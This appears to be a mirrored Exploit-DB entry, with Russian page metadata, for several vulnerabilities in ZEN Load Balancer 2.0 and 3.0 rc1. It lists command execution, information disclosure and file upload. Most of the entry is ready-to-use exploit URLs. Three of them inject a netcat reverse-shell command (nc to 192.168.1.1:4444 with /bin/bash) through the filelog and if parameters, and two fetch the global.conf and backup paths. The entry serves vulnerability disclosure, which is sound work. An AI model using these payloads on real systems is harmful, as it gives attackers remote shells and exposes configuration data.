- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 37830
- Проверка EDB
-
- Пройдено
- Автор
- BRENDAN COLES
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- N/A
- Дата публикации
- 2012-09-24
ZEN Load Balancer - Multiple Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/55638/info
ZEN Load Balancer is prone to the following security vulnerabilities:
1. Multiple arbitrary command-execution vulnerabilities
2. Multiple information-disclosure vulnerabilities
3. An arbitrary file-upload vulnerability
An attacker can exploit these issues to execute arbitrary commands, upload arbitrary files to the affected computer, or disclose sensitive-information.
ZEN Load Balancer 2.0 and 3.0 rc1 are vulnerable.
http://www.example.com/index.cgi?id=2-2&filelog=%26nc+192.168.1.1+4444+-e+/bin/bash;&nlines=1&action=See+logs
http://www.example.com/index.cgi?id=2-2&filelog=#&nlines=1%26nc+192.168.1.1+4444+-e+/bin/bash;&action=See+logs
http://www.example.com/index.cgi?id=3-2&if=lo%26nc+192.168.1.1+4444+-e+/bin/bash%26&status=up&newip=0.0.0.0&netmask=255.255.255.0&gwaddr=&action=Save+%26+Up!
http://www.example.com/config/global.conf
http://www.example.com/backup/- Источник
- www.exploit-db.com
